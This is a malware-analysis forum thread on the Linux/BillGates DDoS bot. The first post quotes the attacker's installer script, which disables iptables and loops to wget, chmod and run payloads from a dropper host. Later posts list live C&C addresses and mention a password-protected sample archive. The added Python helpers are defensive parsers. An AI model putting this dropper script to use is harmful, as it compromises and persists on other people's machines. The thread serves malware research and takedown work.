A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24927  by unixfreaxjp
 Tue Jan 13, 2015 11:56 am
Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/
Infected with "active" effort using this installer script (note the semi-automation trail):
#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
# Take the host firewall down first so the payload can talk to the CNC and
# stays reachable after reboot (chkconfig keeps it off).
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
# Wipe any earlier copy of the bot before (re)installing.
rm -f /tmp/mmm*
# Watchdog loop: every 10 s make sure both payloads (the ELF bot "mmm" and the
# helper script "fk.sh") are running; if not, run the on-disk copy, and if that
# is gone, pull it again from the dropper host (IP:PORT is redacted as posted).
while true
do
    ps aux | grep mmm | grep -v grep
    if [ $? -eq 0 ];then
        sleep 10
    else
        ls -l /tmp/mmm
        if [ $? -eq 0 ];then
            /tmp/mmm
        else
            cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
        fi
    fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
        sleep 10
    else
        ls -l /tmp/fk.sh
        # sic: the missing space before "]" makes this test abort with
        # "[: missing ]" (exit status 2), so the else branch runs every time
        # fk.sh is not already a running process, i.e. it is always re-fetched.
        if [ $? -eq 0];then
            /tmp/fk.sh
        else
            cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
    fi
done
The CNC is on a domain basis, to be knocked down:
ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com 
syscall PoC:
sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16);
CNC IP/port is up and live, feel free to play :-)
120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD
Sample spotted+contributed by malmouse - #MalwareMustDie!
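The sendto() line above carries the complete DNS query on the wire, so the CNC hostname can be recovered straight from the syscall trace without resolving anything. The following Python is an added example, not code from the post or from the sample: it decodes that 32-byte payload (copied from the strace line with the octal escapes converted to hex) into the header fields and the question section. The name reader also follows RFC 1035 compression pointers with a hop bound, so the same routine can be pointed at captured responses or at deliberately malformed packets without looping.

```python
import struct

# Constructed from the strace line in the post above: the 32-byte UDP payload
# the sample handed to sendto(), octal escapes converted to hex.
SENDTO_PAYLOAD = (
    b"\xdb\xfb\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
    b"\x02ma\x07wudikkk\x03com\x00\x00\x01\x00\x01"
)

QTYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT",
          28: "AAAA", 255: "ANY"}


def read_name(buf, offset):
    """Decode a DNS name starting at `offset`.

    Returns (name, offset_after_name). Compression pointers (top two bits set,
    RFC 1035 4.1.4) are followed, but the number of hops is bounded so a
    pointer loop in a hostile packet raises instead of spinning forever.
    """
    labels = []
    jumped = False
    end = offset
    hops = 0
    while True:
        if offset >= len(buf):
            raise ValueError("name runs past end of packet")
        length = buf[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:
            if offset + 1 >= len(buf):
                raise ValueError("truncated compression pointer")
            pointer = struct.unpack_from("!H", buf, offset)[0] & 0x3FFF
            if not jumped:
                end = offset + 2      # caller resumes after the first pointer
            jumped = True
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            offset = pointer
            continue
        if length > 63:
            raise ValueError("label longer than 63 bytes")
        offset += 1
        labels.append(buf[offset:offset + length].decode("ascii", "replace"))
        offset += length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_dns_query(buf):
    """Parse the 12-byte header and the question section of a DNS message."""
    if len(buf) < 12:
        raise ValueError("shorter than a DNS header")
    txid, flags, qd, an, ns, ar = struct.unpack_from("!6H", buf, 0)
    msg = {
        "id": txid,
        "is_response": bool(flags & 0x8000),
        "opcode": (flags >> 11) & 0xF,
        "recursion_desired": bool(flags & 0x0100),
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
        "questions": [],
    }
    offset = 12
    for _ in range(qd):
        name, offset = read_name(buf, offset)
        if offset + 4 > len(buf):
            raise ValueError("truncated question section")
        qtype, qclass = struct.unpack_from("!HH", buf, offset)
        offset += 4
        msg["questions"].append({
            "name": name,
            "qtype": QTYPES.get(qtype, qtype),
            "qclass": "IN" if qclass == 1 else qclass,
        })
    return msg


if __name__ == "__main__":
    for key, value in parse_dns_query(SENDTO_PAYLOAD).items():
        print(f"{key}: {value}")
```

Run it as-is to see the decoded query (transaction id 0xdbfb, RD set, one question for ma.wudikkk.com, type A, class IN); to decode another trace, paste the bytes from the strace line into SENDTO_PAYLOAD the same way.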
 #24948  by kekieres
 Wed Jan 14, 2015 6:36 pm
On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?
 #24951  by unixfreaxjp
 Thu Jan 15, 2015 12:51 am
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
 #24954  by kekieres
 Thu Jan 15, 2015 9:04 am
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C&C? Just executing in a sandbox and monitoring the traffic? Or using strace? Both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
I truly understand you.
Well, I did it my way and I can say that the sample connects with 218.90.200.250 on port tcp/250000.
As far as I've seen and understood, it's just reporting to the C&C.

Just after that contact, it's constantly trying to resolve hostname fk.appledoesnt.com that at the moment does not exist.

In case someone wants the pcap just contact me.

Just my last question. I suppose people have noticed, with a simple strings, that within all samples there is a big list of IP addresses. In my sample they are all located in Asia. Does anyone have a clue what they are?
 #24978  by unixfreaxjp
 Sat Jan 17, 2015 4:58 pm
BillGates DDoSer with speedy infection, suspected to be Shellshock driven.
VT: https://www.virustotal.com/en/file/7a91 ... 421512473/
CNC is in USA:
Sun Jan 18 01:45:24 JST 2015
Connection to 23.228.102.133 25001 port succeeded!
TCP MMD.Kicks.PRC.Moronz:xxxx->23.228.102.133:25001 (ESTABLISHED)
at ASN: 46573 | 23.228.102.0/24 | GLOBAL-FRAG-SERVERS | USA | ARIEL MICHAELI
#MalwareMustDie!
 #25282  by malwarelabs
 Thu Feb 19, 2015 10:08 am
130 BillGates samples attached
pwd: infected
 #26219  by unixfreaxjp
 Wed Jul 01, 2015 10:59 am
Linux/BillGates was used by the ChinaZ actor as a payload, together with Linux/.Iptables|x.
Report http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT: https://www.virustotal.com/en/file/067f ... /analysis/
CNC Info:
Hostname: udp.f1122.org
IP: 61.160.213.18
Port: 25001

61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn
ChinaNet Jiangsu Province Network
{
"ip": "61.160.213.18",
"hostname": "udp.f1122.org",
"city": "Nanjing",
"region": "Jiangsu",
"country": "CN",
"loc": "32.0617,118.7778",
"org": "AS23650 AS Number for CHINANET jiangsu province backbone"
}
 #26233  by unixfreaxjp
 Fri Jul 03, 2015 9:48 pm
Attacking routers with SSH brute force.

Using a hacked PC to attack, obviously.

The panel on that PC, weaponized with two ELF malware binaries (MIPS and x32).

CNC: 123.249.45.210:36000

VT:
https://www.virustotal.com/en/file/6c39 ... 435959461/
https://www.virustotal.com/en/file/9857 ... 435959488/

#MalwareMUSTDie!!
 #26236  by unixfreaxjp
 Sat Jul 04, 2015 10:45 pm
kekieres wrote:
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
(snipped)
Just my last question. I suppose people have noticed, with a simple strings, that within all samples there is a big list of IP addresses. In my sample they are all located in Asia. Does anyone have a clue what they are?
Those IPs are a DNS amplifier IP list used for DNS flood attacks. Linux/BillGates malware has this function.

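The embedded list kekieres asked about shows up in strings output as one long uninterrupted column of dotted quads. The script below is an added example, not tooling from MalwareMustDie or anyone in this thread: it pulls every such run out of a strings dump, validates each entry as a real IPv4 address (so a stray "256.1.1.1" ends a run rather than joining it), and flags any RFC 1918 address inside the run, which in a reflector list is worth a second look. The strings sample is constructed; documentation-range addresses (RFC 5737) stand in for the real amplifier list, which is not reproduced here.

```python
import ipaddress
import re
import sys

# Constructed stand-in for `strings sample`: not taken from any BillGates
# binary. A few ordinary ELF strings, one hostname, and a block of dotted
# quads in the RFC 5737 documentation ranges playing the reflector list.
SAMPLE_STRINGS = """\
/lib64/ld-linux-x86-64.so.2
libpthread.so.0
fk.appledoesnt.com
/tmp/mmm
192.0.2.10
192.0.2.11
198.51.100.7
198.51.100.8
203.0.113.53
203.0.113.54
10.0.0.1
256.1.1.1
GLIBC_2.2.5
"""

DOTTED_QUAD = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def ip_runs(strings_output, min_run=4):
    """Return every run of at least `min_run` consecutive lines that are
    valid IPv4 literals. Hard-coded target/reflector tables show up in
    `strings` as exactly this shape; a non-address line ends the run."""
    runs, current = [], []
    for line in strings_output.splitlines():
        line = line.strip()
        if DOTTED_QUAD.match(line):
            try:
                # IPv4Address rejects out-of-range octets such as 256.1.1.1
                current.append(str(ipaddress.IPv4Address(line)))
                continue
            except ipaddress.AddressValueError:
                pass
        if len(current) >= min_run:
            runs.append(current)
        current = []
    if len(current) >= min_run:
        runs.append(current)
    return runs


def summarize(run):
    """Deduplicate a run and flag RFC 1918 entries. A reflector list should be
    entirely public; a private address in it usually means a test artifact
    left by the operator or a misparse on our side."""
    uniq = sorted(set(run), key=ipaddress.IPv4Address)
    private = [ip for ip in uniq
               if any(ipaddress.IPv4Address(ip) in net for net in RFC1918)]
    return {"total": len(run), "unique": len(uniq),
            "rfc1918": private, "list": uniq}


if __name__ == "__main__":
    # Pipe real output in: strings -n 7 sample | python3 reflectors.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_STRINGS
    for run in ip_runs(text):
        info = summarize(run)
        print(f"run of {info['total']} addresses ({info['unique']} unique), "
              f"rfc1918: {info['rfc1918'] or 'none'}")
        for ip in info["list"]:
            print("  ", ip)
```

The extracted list is what you would feed to a block rule on the reflector side or, with the victim's consent, to an open-resolver check; the script itself never sends a packet.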